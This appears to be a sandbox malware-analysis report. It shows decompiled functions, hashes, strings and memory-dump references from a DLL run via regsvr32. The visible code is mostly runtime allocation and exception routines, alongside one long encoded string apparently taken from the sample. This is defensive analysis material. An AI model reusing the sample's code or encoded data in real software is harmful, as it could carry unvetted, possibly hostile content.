Function 00007FFD2B0642CC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00007FFD7FFD2B0642CC(void* __eax, long long __rcx, unsigned int __rdx, long long __r8, void* _a8, long long _a16, long long _a24, signed int _a32) {
				char _v96;
				long long _v104;
				void* __rbx;
				void* __rdi;
				void* _t32;
				void* _t33;
				void* _t48;
				unsigned long long _t58;
				long long _t70;
				long long* _t71;
				long long _t74;
				unsigned long long _t79;
				long long _t83;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v104 = 0xfffffffe;
				_t70 = __rcx;
				if ((__rdx | 0x0000000f) - 0xfffffffe <= 0) goto 0x2b06430b;
				goto 0x2b06433c;
				_t79 =  *((intOrPtr*)(__rcx + 0x18));
				_t58 = _t79 >> 1;
				if (_t58 - __rdx >> 1 <= 0) goto 0x2b06433c;
				_t48 = 0xfffffffe - _t58;
				if (_t79 - 0xfffffffe <= 0) goto 0x2b06433c;
				if (0xffffffffffffffff == 0) goto 0x2b064393;
				if (0xffffffffffffffff - 0xffffffff > 0) goto 0x2b06435a; // executed
				E00007FFD7FFD2B0658C8(_t48, 0xffffffffffffffff); // executed
				if (_t48 != 0) goto 0x2b064393;
				_a32 = _a32 & 0x00000000;
				E00007FFD7FFD2B064F80( &_v96,  &_a32);
				_v96 = 0x2b082730;
				E00007FFD7FFD2B067D3C(_t33, _t48, 0x2b082730, 0xfffffffe,  &_v96, 0x2b0c5c38, _t70);
				_t71 = _a8;
				_t83 = _a24;
				_t74 = _a32;
				if (_t83 == 0) goto 0x2b0643d4;
				if ( *((long long*)(_t71 + 0x18)) - 0x10 < 0) goto 0x2b0643c6;
				goto 0x2b0643c9;
				_t32 = E00007FFD7FFD2B064B80(_t33,  *((long long*)(_t71 + 0x18)) - 0x10, _t74, _t71, _t83);
				if ( *((long long*)(_t71 + 0x18)) - 0x10 < 0) goto 0x2b0643e3;
				0x2b064a78();
				 *_t71 = 0;
				 *_t71 = _t74;
				 *((long long*)(_t71 + 0x18)) = _a16;
				 *((long long*)(_t71 + 0x10)) = _t83;
				_t72 =  >=  ? _t74 : _t71;
				 *((char*)(( >=  ? _t74 : _t71) + _t83)) = 0;
				return _t32;
			}

0x7ffd2b0642cc
0x7ffd2b0642d1
0x7ffd2b0642d6
0x7ffd2b0642e4
0x7ffd2b0642f0
0x7ffd2b064304
0x7ffd2b064309
0x7ffd2b06430b
0x7ffd2b064312
0x7ffd2b064328
0x7ffd2b06432d
0x7ffd2b064337
0x7ffd2b064345
0x7ffd2b06434b
0x7ffd2b06434d
0x7ffd2b064358
0x7ffd2b06435a
0x7ffd2b064370
0x7ffd2b06437c
0x7ffd2b06438d
0x7ffd2b064395
0x7ffd2b06439d
0x7ffd2b0643ad
0x7ffd2b0643b8
0x7ffd2b0643bf
0x7ffd2b0643c4
0x7ffd2b0643cf
0x7ffd2b0643d9
0x7ffd2b0643de
0x7ffd2b0643e3
0x7ffd2b0643e6
0x7ffd2b0643e9
0x7ffd2b0643ed
0x7ffd2b0643f5
0x7ffd2b0643f9
0x7ffd2b064407

APIs

std::exception::exception.LIBCMT ref: 00007FFD2B064370

Strings

OAjfRFBkVjFgd1dlqs9qQOdoY3VSeEs4EiVoeWNGIV9teDFLeG1iAHVST0RTZFYxZHdXZVUwakBfaGN16nhLOFw60ndj8iiSTMAwB7VMNmgcIW80IQsxQwUadwY0XgQvK0gBEHIKPlZyTAZZJwlyfwAXVS5WYG8KUVJPRFNkVjHkIFyNkQYP+5teBs6WTi6D62rowrJyROTUN4jwvVsHu8wd9P+WUjOKNh40DZEGD/tfaGN1UnhLOAJgaHkHwCVflI9a, xrefs: 00007FFD2B0642DC

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: std::exception::exception
String ID: OAjfRFBkVjFgd1dlqs9qQOdoY3VSeEs4EiVoeWNGIV9teDFLeG1iAHVST0RTZFYxZHdXZVUwakBfaGN16nhLOFw60ndj8iiSTMAwB7VMNmgcIW80IQsxQwUadwY0XgQvK0gBEHIKPlZyTAZZJwlyfwAXVS5WYG8KUVJPRFNkVjHkIFyNkQYP+5teBs6WTi6D62rowrJyROTUN4jwvVsHu8wd9P+WUjOKNh40DZEGD/tfaGN1UnhLOAJgaHkHwCVflI9a
API String ID: 2807920213-3224431414
Opcode ID: d9c12ae1406452b5f312906f17d1c8f5d90fd254b63518b18597baa1296567fa
Instruction ID: aa3ad7786e0bf911b3b94f2dd909cff6c3f41a0d7dfac1f56d7fbe8ededd2bdc
Opcode Fuzzy Hash: d9c12ae1406452b5f312906f17d1c8f5d90fd254b63518b18597baa1296567fa
Instruction Fuzzy Hash: E031F732B0A75188EE228B15DA612AC62A4FB567F0F484331DB6C077F9DFACD451D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0658C8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FFD7FFD2B0658C8(intOrPtr* __rax, long long __rcx) {
				void* __rbx;
				void* _t2;
				long long _t6;
				void* _t10;

				_t6 = __rcx;
				goto 0x2b0658e2;
				if (E00007FFD7FFD2B067880(__rax, __rcx) == 0) goto 0x2b0658f2;
				_t2 = E00007FFD7FFD2B0652E4(__rax, _t6, _t6, _t10); // executed
				if (__rax == 0) goto 0x2b0658d3;
				return _t2;
			}

0x7ffd2b0658ce
0x7ffd2b0658d1
0x7ffd2b0658dd
0x7ffd2b0658e2
0x7ffd2b0658ea
0x7ffd2b0658f1

APIs

Part of subcall function 00007FFD2B0652E4: _FF_MSGBANNER.LIBCMT ref: 00007FFD2B065314
Part of subcall function 00007FFD2B0652E4: RtlAllocateHeap.NTDLL(?,?,?,00007FFD2B064F2A,?,?,?,00007FFD2B064FA4), ref: 00007FFD2B065339
Part of subcall function 00007FFD2B0652E4: _errno.LIBCMT ref: 00007FFD2B06535D
Part of subcall function 00007FFD2B0652E4: _errno.LIBCMT ref: 00007FFD2B065368

std::exception::exception.LIBCMT ref: 00007FFD2B06594F

Strings

bad allocation, xrefs: 00007FFD2B06591F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: _errno$AllocateHeapstd::exception::exception
String ID: bad allocation
API String ID: 1314232209-2104205924
Opcode ID: 3e7baf1199727d481d3abec1560be74db8e592b479bc2e4e196976cde6b830c9
Instruction ID: 0a4ac0f50bab80206c079d23aba0650b22dec815687b80a34f178419de9f2d1f
Opcode Fuzzy Hash: 3e7baf1199727d481d3abec1560be74db8e592b479bc2e4e196976cde6b830c9
Instruction Fuzzy Hash: 94012E61B0A70B98FA169B11AE621B82360AF46340F440131D64E46AB2EFBCF644E794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B063854 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFD7FFD2B063854() {
				void* _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t5;

				_t5 =  *0x2b0c9d40; // 0x180000000
				E00007FFD7FFD2B063714(_t2, _t3, _t4, _t5, "DllRegisterServer"); // executed
				ExitProcess(??);
			}

0x7ffd2b063858
0x7ffd2b063866
0x7ffd2b06386b

APIs

ExitProcess.KERNEL32 ref: 00007FFD2B06386B

Strings

DllRegisterServer, xrefs: 00007FFD2B06385F

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: a7725c2e1ab9d96b242d7277f1d305e1c0fe06ce0d8d7c5746fcd363cce856e6
Instruction ID: ba35c6ae71a85b257e91da9bb39ddf90b7c3e3c595cac0e790514e14b288c6eb
Opcode Fuzzy Hash: a7725c2e1ab9d96b242d7277f1d305e1c0fe06ce0d8d7c5746fcd363cce856e6
Instruction Fuzzy Hash: 17C08C01F2600381DA0663A2EDA20B402206B86300F808030C00D4A670CEAC9142A3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B073304 Relevance: 3.0, APIs: 2, Instructions: 46
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD2B073304(void* __eax, long long __rbx, signed int __rcx, signed int __rdx, intOrPtr* __r8, long long _a8) {
				void* _t16;
				intOrPtr* _t29;
				signed int _t36;

				_t36 = __rdx;
				_a8 = __rbx;
				if (__rcx == 0) goto 0x2b073336;
				_t2 = _t36 - 0x20; // -32
				_t29 = _t2;
				if (_t29 - __rdx >= 0) goto 0x2b073336;
				E00007FFD7FFD2B067698(_t29);
				 *_t29 = 0xc;
				goto 0x2b073393;
				_t39 =  ==  ? _t29 : __rdx * __rcx;
				if (( ==  ? _t29 : __rdx * __rcx) - 0xffffffe0 > 0) goto 0x2b073366;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t29 != 0) goto 0x2b073393;
				if ( *0x2b0c96d8 == 0) goto 0x2b073388;
				_t16 = E00007FFD7FFD2B067880(_t29,  ==  ? _t29 : __rdx * __rcx);
				if (_t16 != 0) goto 0x2b073346;
				if (__r8 == 0) goto 0x2b073332;
				 *__r8 = 0xc;
				goto 0x2b073332;
				if (__r8 == 0) goto 0x2b073393;
				 *__r8 = 0xc;
				return _t16;
			}

0x7ffd2b073304
0x7ffd2b073304
0x7ffd2b073317
0x7ffd2b07331b
0x7ffd2b07331b
0x7ffd2b073325
0x7ffd2b073327
0x7ffd2b07332c
0x7ffd2b073334
0x7ffd2b073342
0x7ffd2b07334c
0x7ffd2b07335b
0x7ffd2b073364
0x7ffd2b07336d
0x7ffd2b073372
0x7ffd2b073379
0x7ffd2b07337e
0x7ffd2b073380
0x7ffd2b073386
0x7ffd2b07338b
0x7ffd2b07338d
0x7ffd2b07339d

APIs

_errno.LIBCMT ref: 00007FFD2B073327
RtlAllocateHeap.NTDLL(?,?,00000000,00007FFD2B06799F,?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1), ref: 00007FFD2B07335B

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_errno
String ID:
API String ID: 242259997-0
Opcode ID: 15aed51b0303d51ca0d25e19db35722826594bd96e08494acdc70313b1aa94f7
Instruction ID: 8b52c11290724642803438a4a8c3fe6efa3e10a5de55236648502fbc46f69db3
Opcode Fuzzy Hash: 15aed51b0303d51ca0d25e19db35722826594bd96e08494acdc70313b1aa94f7
Instruction Fuzzy Hash: B2117361B4F2428AFB674B14DB64378A291EF467A4F04C530CA19476E4DFFCA442A280

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06796C Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00007FFD7FFD2B06796C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t10;
				void* _t11;
				void* _t17;
				void* _t20;
				long long _t29;
				void* _t37;
				void* _t40;
				long _t41;

				_t29 = __rdi;
				_t20 = _t37;
				 *((long long*)(_t20 + 8)) = __rbx;
				 *((long long*)(_t20 + 0x10)) = __rbp;
				 *((long long*)(_t20 + 0x18)) = __rsi;
				 *((long long*)(_t20 + 0x20)) = __rdi;
				r12d = r12d | 0xffffffff;
				r8d = 0;
				_t11 = E00007FFD7FFD2B073304(_t10, __rbx, __rcx, __rdx, _t40); // executed
				if (_t20 != 0) goto 0x2b0679d1;
				_t17 =  *0x2b0c96dc - _t11; // 0x0
				if (_t17 <= 0) goto 0x2b0679d1;
				Sleep(_t41);
				_t5 = _t29 + 0x3e8; // 0x3e8
				r11d = _t5;
				_t15 =  >  ? r12d : r11d;
				_t19 = ( >  ? r12d : r11d) - r12d;
				if (( >  ? r12d : r11d) != r12d) goto 0x2b067991;
				return _t11;
			}

0x7ffd2b06796c
0x7ffd2b06796c
0x7ffd2b06796f
0x7ffd2b067973
0x7ffd2b067977
0x7ffd2b06797b
0x7ffd2b06798d
0x7ffd2b067991
0x7ffd2b06799a
0x7ffd2b0679a5
0x7ffd2b0679a7
0x7ffd2b0679ad
0x7ffd2b0679b1
0x7ffd2b0679b7
0x7ffd2b0679b7
0x7ffd2b0679c8
0x7ffd2b0679cc
0x7ffd2b0679cf
0x7ffd2b0679ee

APIs

Part of subcall function 00007FFD2B073304: _errno.LIBCMT ref: 00007FFD2B073327

Sleep.KERNEL32(?,?,?,00007FFD2B067F0B,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B0679B1

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: 1df89c9bbc89020be2e631528f36fa71a39b12f04b70da834663132499cb3824
Instruction ID: 41493b34c3b66ce7522ecd604e0949cadf8fe85498ae0b10580dab1e43b12879
Opcode Fuzzy Hash: 1df89c9bbc89020be2e631528f36fa71a39b12f04b70da834663132499cb3824
Instruction Fuzzy Hash: 6801A733B15A858AEA568F169911029B7A1FB89FD0B094131DF5D037A0CF7CE851D740

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD2B06D720 Relevance: 140.8, APIs: 64, Strings: 16, Instructions: 849
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 52%

			E00007FFD7FFD2B06D720(signed long long __rbx, signed long long* __rcx, signed long long __rdx, void* __r8, void* __r10, void* __r11) {
				void* __rdi;
				void* __rsi;
				void* __r12;
				signed int _t262;
				signed int _t264;
				signed int _t272;
				signed int _t320;
				unsigned int _t369;
				unsigned int _t378;
				unsigned int _t417;
				unsigned int _t426;
				void* _t442;
				signed int _t444;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				unsigned int _t453;
				unsigned int _t461;
				signed int _t519;
				signed int _t521;
				void* _t522;
				signed int _t523;
				void* _t528;
				void* _t536;
				signed int _t548;
				signed int _t593;
				void* _t614;
				void* _t627;
				void* _t628;
				signed int _t631;
				signed int _t632;
				signed int _t636;
				signed long long* _t637;
				char* _t638;
				void* _t788;
				signed long long* _t789;
				void* _t791;
				void* _t793;
				void* _t794;
				signed long long* _t796;
				void* _t797;
				void* _t799;
				char* _t805;
				void* _t808;
				void* _t810;
				signed long long _t811;
				void* _t814;
				void* _t816;

				_t803 = __r10;
				_t799 = __r8;
				_t637 = _t796;
				_t637[1] = __rbx;
				_t794 = _t637 - 0x5f;
				_t797 = _t796 - 0xf0;
				 *(_t797 + 0x40) =  *(_t797 + 0x40) & 0x00000000;
				 *(_t797 + 0x48) =  *(_t797 + 0x48) & 0xffff0000;
				asm("movaps [eax-0x48], xmm6");
				asm("movaps [eax-0x58], xmm7");
				_t811 = __rdx;
				_t789 = __rcx;
				_t262 = E00007FFD7FFD2B0697F0();
				_t523 = _t262;
				if ( *((long long*)(__rdx)) == 0) goto 0x2b06d77a;
				if (( *(__rdx + 8) & 0x00000200) == 0) goto 0x2b06d77a;
				 *(_t794 + 0x7f) = 1;
				goto 0x2b06d77e;
				 *(_t794 + 0x7f) =  *(_t794 + 0x7f) & 0x00000000;
				if (_t262 != 0xffff) goto 0x2b06d799;
				__rcx[1] = __rcx[1] & 0xffff00ff;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 2;
				goto 0x2b06e411;
				if (_t262 != 0xfffe) goto 0x2b06d7c6;
				E00007FFD7FFD2B06A490(1, _t637, _t797 + 0x30);
				asm("movups xmm0, [eax]");
				asm("movdqu [edi], xmm0");
				_t264 = E00007FFD7FFD2B06AC78(_t637, __rcx, __rdx);
				goto 0x2b06e411;
				_t528 = _t264 - 0xfffd;
				if (_t528 != 0) goto 0x2b06d7db;
				asm("inc ecx");
				asm("movdqu [edi], xmm0");
				goto 0x2b06e411;
				r14d = _t264;
				r14d = r14d & 0x00008000;
				if (_t528 == 0) goto 0x2b06dfa1;
				r15d = 0;
				r12d = _t264;
				_t452 = _t264 & 0x00001800;
				 *(_t794 + 0x6f) = _t452;
				r15b = _t452 == 0x800;
				r12d = r12d & 0x00001000;
				_t444 = _t264 & 0x00000400;
				 *((intOrPtr*)(_t794 - 0x39)) = r15d;
				_t266 =  !=  ? _t444 : r12d;
				 *(_t794 + 0x77) = _t444;
				 *(_t794 - 0x35) = r12d;
				_t531 =  !=  ? _t444 : r12d;
				if (( !=  ? _t444 : r12d) == 0) goto 0x2b06d83d;
				if ((_t523 & 0x00001b00) == 0x1000) goto 0x2b06dfa1;
				_t270 =  !=  ? _t444 : r12d;
				_t534 =  !=  ? _t444 : r12d;
				if (( !=  ? _t444 : r12d) == 0) goto 0x2b06d867;
				_t272 = _t523 & 0x00001b00;
				if (_t272 == 0x1100) goto 0x2b06dfa1;
				_t536 = _t272 - 0x1200;
				if (_t536 == 0) goto 0x2b06dfa1;
				asm("bt esi, 0xe");
				if (_t536 >= 0) goto 0x2b06d8f3;
				_t453 =  *0x2b0c9a8c; // 0x0
				if (( !(_t453 >> 1) & 0x00000001) == 0) goto 0x2b06d8c6;
				if (( !(_t453 >> 3) & 0x00000001) == 0) goto 0x2b06d8c6;
				E00007FFD7FFD2B06D634( !(_t453 >> 3), 0x1000, _t523, _t637, _t797 + 0x30, __rcx, _t791, _t799, __r10, __r11);
				_t642 = _t637;
				E00007FFD7FFD2B06A9A8(0x20, _t637, _t794 - 0x59);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x79], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t794 - 0x79, _t637);
				asm("movaps xmm5, [ebp-0x79]");
				asm("movdqa [esp+0x40], xmm5");
				goto 0x2b06d8f0;
				E00007FFD7FFD2B06D634( !(_t453 >> 3), 0x20, _t523, _t637, _t797 + 0x30, _t789, _t791, _t799, __r10, __r11);
				if ( *(_t797 + 0x48) == 3) goto 0x2b06d8f0;
				if (_t637[1] - 1 <= 0) goto 0x2b06d8f0;
				 *(_t797 + 0x48) =  *(_t797 + 0x48) ^ (_t637[1] ^  *(_t797 + 0x48)) & 0x000000ff;
				r12d =  !=  ?  *(_t794 + 0x77) : r12d;
				if (r12d == 0) goto 0x2b06daa0;
				if ( *(_t794 + 0x6f) != 0x1800) goto 0x2b06daa0;
				E00007FFD7FFD2B06B32C(0, _t637, _t637, _t797 + 0x30, _t789, _t791, __r10, __r11, _t816, _t814, _t810);
				asm("inc ecx");
				asm("movdqu [ebp-0x79], xmm5");
				E00007FFD7FFD2B06AF5C(0x7b, _t523, _t637, _t637, _t794 - 0x79, _t791, _t799, _t808);
				asm("movaps xmm5, [ebp-0x79]");
				asm("movdqa [ebp-0x79], xmm5");
				E00007FFD7FFD2B06AC78(_t637, _t794 - 0x79, _t797 + 0x30);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t794 - 0x79);
				_t805 =  *0x2b0c9a70; // 0x0
				if ( *_t805 == 0) goto 0x2b06d999;
				if ( *_t805 == 0x41) goto 0x2b06d97d;
				 *(_t794 - 0x49) =  *(_t794 - 0x49) & 0x00000000;
				 *(_t794 - 0x41) =  *(_t794 - 0x41) & 0xffff0002 | 0x00000002;
				goto 0x2b06d9a7;
				_t806 = _t805 + 1;
				 *0x2b0c9a70 = _t805 + 1;
				E00007FFD7FFD2B06A9E0(_t794 - 0x49, "{flat}");
				goto 0x2b06d9a7;
				E00007FFD7FFD2B06A490(1, _t637, _t794 - 0x49);
				if (( *0x2b0c9a8c & 0x00001000) != 0) goto 0x2b06d9fb;
				E00007FFD7FFD2B06A9A8(0x2c, _t637, _t797 + 0x30);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x79], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t794 - 0x79, _t794 - 0x49);
				asm("movaps xmm5, [ebp-0x79]");
				asm("movdqa [ebp-0x79], xmm5");
				E00007FFD7FFD2B06AFE0( *(_t794 + 0x6f), _t523, _t637, _t637, _t794 - 0x79, "}\' ", _t791, _t799, _t788);
				E00007FFD7FFD2B06AC78(_t637, _t797 + 0x40, _t794 - 0x79);
				E00007FFD7FFD2B06AFE0( *(_t794 + 0x6f), _t523, _t637, _t637, _t797 + 0x40, "}\'", _t791, _t799, _t791);
				E00007FFD7FFD2B06ADBC(_t797 + 0x30);
				r11d =  *0x2b0c9a8c; // 0x0
				if (( !(r11d >> 1) & 0x00000001) == 0) goto 0x2b06df93;
				_t548 =  !(r11d >> 4) & 0x00000001;
				if (_t548 == 0) goto 0x2b06df93;
				asm("inc ecx");
				if (_t548 < 0) goto 0x2b06df93;
				E00007FFD7FFD2B06A9A8(0x20, _t637, _t794 - 0x59);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x79], xmm0");
				E00007FFD7FFD2B06AC78(_t637, _t794 - 0x79, _t797 + 0x30);
				asm("movaps xmm5, [ebp-0x79]");
				asm("movdqa [ebp-0x79], xmm5");
				E00007FFD7FFD2B06AF5C(0x20, _t523, _t637, _t637, _t794 - 0x79, _t791, _t799, _t793);
				asm("movaps xmm5, [ebp-0x79]");
				asm("movdqa [ebp-0x79], xmm5");
				E00007FFD7FFD2B06AC78(_t637, _t794 - 0x79, _t797 + 0x40);
				asm("movaps xmm6, [ebp-0x79]");
				r13d =  *(_t794 + 0x6f);
				goto 0x2b06e218;
				 *(_t794 - 0x19) =  *(_t794 - 0x19) & 0x00000000;
				 *(_t794 - 9) =  *(_t794 - 9) & 0x00000000;
				 *(_t794 - 0x29) =  *(_t794 - 0x29) & 0x00000000;
				 *(_t794 - 0x59) =  *(_t794 - 0x59) & 0x00000000;
				 *(_t794 - 0x49) =  *(_t794 - 0x49) & 0x00000000;
				r12d =  *(_t794 - 0x35);
				 *(_t794 - 0x11) =  *(_t794 - 0x11) & 0xffff0000;
				 *(_t794 - 1) =  *(_t794 - 1) & 0xffff0000;
				 *(_t794 - 0x21) =  *(_t794 - 0x21) & 0xffff0000;
				 *(_t794 - 0x51) =  *(_t794 - 0x51) & 0xffff0000;
				_t447 =  *(_t794 - 0x41) & 0xffff0000;
				 *(_t794 - 0x41) = _t447;
				_t309 =  !=  ?  *(_t794 + 0x77) : r12d;
				_t550 =  !=  ?  *(_t794 + 0x77) : r12d;
				if (( !=  ?  *(_t794 + 0x77) : r12d) == 0) goto 0x2b06db6a;
				if (r15d == 0) goto 0x2b06db52;
				if ((_t523 & 0x00000700) != 0x600) goto 0x2b06db29;
				E00007FFD7FFD2B06B32C(1, _t637, _t642, _t797 + 0x30, _t789, _t791, __r10, _t805 + 1);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x19], xmm5");
				E00007FFD7FFD2B06B32C(1, _t637, _t642, _t797 + 0x30, _t789, _t791, __r10, _t805 + 1);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x9], xmm5");
				goto 0x2b06db3c;
				if (r15d == 0) goto 0x2b06db52;
				if ((_t523 & 0x00000700) != 0x500) goto 0x2b06db52;
				E00007FFD7FFD2B06B32C(1, _t637, _t642, _t797 + 0x30, _t789, _t791, __r10, _t805 + 1);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x29], xmm5");
				E00007FFD7FFD2B06B32C(1, _t637, _t642, _t797 + 0x30, _t789, _t791, _t803, _t805 + 1);
				asm("movaps xmm7, [esp+0x30]");
				goto 0x2b06db6e;
				asm("movaps xmm7, [ebp-0x59]");
				if (r15d == 0) goto 0x2b06dbf8;
				if ((_t523 & 0x00000700) == 0x200) goto 0x2b06dbf8;
				 *(_t794 - 0x51) =  *(_t794 - 0x51) & 0xffff0000;
				 *(_t794 - 0x71) =  *(_t794 - 0x71) & 0xffff0000;
				_t320 =  *0x2b0c9a8c; // 0x0
				 *(_t794 - 0x59) =  *(_t794 - 0x59) & 0x00000000;
				 *(_t794 - 0x79) =  *(_t794 - 0x79) & 0x00000000;
				 *(_t797 + 0x20) = 1;
				if ((_t320 & 0x00000060) == 0x60) goto 0x2b06dbcf;
				E00007FFD7FFD2B06EFA4(_t642, _t797 + 0x30, _t794 - 0x79, _t791, 0x2b08398d, _t794 - 0x59, _t803, _t805 + 1);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x49], xmm5");
				goto 0x2b06dbf8;
				E00007FFD7FFD2B06EFA4(_t642, _t797 + 0x30, _t794 - 0x59, _t791, 0x2b08398d, _t794 - 0x79, _t803, _t806);
				if ( *(_t794 - 0x41) == 3) goto 0x2b06dbf8;
				if ( *(_t797 + 0x38) - 1 <= 0) goto 0x2b06dbf8;
				 *(_t794 - 0x41) = _t447 ^ ( *(_t797 + 0x38) ^ _t447) & 0x000000ff;
				_t461 =  *0x2b0c9a8c; // 0x0
				if (( !(_t461 >> 1) & 0x00000001) == 0) goto 0x2b06dc40;
				if (( !(_t461 >> 4) & 0x00000001) == 0) goto 0x2b06dc40;
				E00007FFD7FFD2B06ADBC(_t794 - 0x79);
